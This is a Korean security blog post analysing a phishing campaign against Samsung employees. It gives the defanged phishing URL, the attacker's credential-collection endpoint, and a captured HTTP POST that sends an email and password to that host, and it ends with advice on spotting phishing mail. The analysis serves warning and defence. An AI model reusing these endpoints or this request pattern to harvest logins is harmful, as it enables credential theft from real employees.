오늘은 삼성 계열사 중 어느 곳인지 모르겠지만, 아무튼 삼성 직원들을 대상으로 한 피싱 메일에 대해 분석을 해보겠습니다. 일단 개인적으로 해당 공격은 이메일 통해서 공격했으리라 생각이 됩니다. 먼저 피싱 사이트 주소는 다음과 같습니다.
hashingalgorithm(.)miamitradingszone(.)com/?quphd1vy2=wiof?wo?ej@samsung.com
입니다.
해당 사이트 특이점으로 피싱(Phishing) 사이트 연결시 진짜 클라우드파이어를 거치고 피싱이 작동을 하는 방식을 취하고 있으며 해당 피싱 사이트 접속을 하면 다음과 같은 화면을 볼 수가 있습니다.
특정분으로 추정되는 사람의 삼성 계정이 입력된 것을 볼 수가 있으며 해당 사이트에 비밀번호를 입력하면 당연히 비밀번호는 다르다고 나옵니다.
해당 부분에서 비밀번호를 입력하면 다음과 같은 사이트에 개인정보를 전송하게 돼 있는 구조를 채택하고 있습니다.
피싱 사이트에서 최종적으로 전송되는 사이트는 다음과 같습니다.
hxxps://lees-engineering(.)net/main/report/rpo365adfs(.)php
입니다.
여기서 보면 간단하게 이메일, 비밀번호가 수집된 것을 확인할 수가 있을 것입니다.
Raw
POST /main/report/rpo365adfs(.)php HTTP/1.1
Host: lees-engineering.net
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:138.0) Gecko/20100101 Firefox/138.0
Accept: */*
Accept-Language: ko-KR,ko;q=0.8,en-US;q=0.5,en;q=0.3
Referer: hxxps://lees-engineering(.)net/main/qmbsnsjtjke6bc60a4da183de2a800645409b27e3(5)3da5bbd65ddc25715b25664c08777717_1744375423_identifier/loginxxt(.)php
Content-Type: application/x-w(w)w-form-urlencoded
Origin: hxxps://lees-engineering(.)net
DNT: 1
Sec-GPC: 1
Connection: keep-alive
Cookie: PHPSESSID=fbf37kvsp6mg4b6ecav75lfh8i; passed_index=true; googtrans=/en/ko; googtrans=/en/ko
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Priority: u=4
Accept-Encoding: gzip, deflate
Content-Length: 57
email=?????ofej%40samsung(.)com&password=test123!%40%23%40
일단 이런 피싱(Phishing)메일에 속지 않는 방법은 링크와 보낸 이의 이메일 주소를 잘 확인하는 것을 추천 드리며 보낸이의 이메일 주소도 진짜로 오게 해서 진화를 하고 있으니 항상 조심하는 것을 추천합니다.
'소프트웨어 팁 > 보안 및 분석' 카테고리의 다른 글
발견되지 않은 엔드포인트를 격리하여 공격을 차단하는 Microsoft Defender (0) | 2025.04.18 |
---|---|
북한 김수키(Kimsuky)에서 만든악성코드-KxS 북한 수해 인터뷰 요청서(대문?아카데미 이?열 이사장님).lnk(2025.4.5) (0) | 2025.04.17 |
윈도우 10,윈도우 11 inetpub 폴더 생성 및 삭제 하지 말것 (0) | 2025.04.16 |
구글 크롬 136 20년간의 브라우저 기록 개인정보 보호 위험 수정 (0) | 2025.04.15 |
윈도우 취약점 CVE-2025-29824을 악용한 랜섬웨어 공격 주의 (0) | 2025.04.11 |
Windows 11 KB5055523,KB5055528,윈도우 10 KB5055518 누적 보안 업데이트 (0) | 2025.04.10 |
북한 해킹 그룹 Konni(코니)에서 만든 악성코드-ECRM.M.hwp.lnk(<-가칭,2025.3.24) (0) | 2025.04.10 |
윈 RAR CVE-2025-31334 취약점 Windows Mark of the Web 보안 경고 우회 (0) | 2025.04.08 |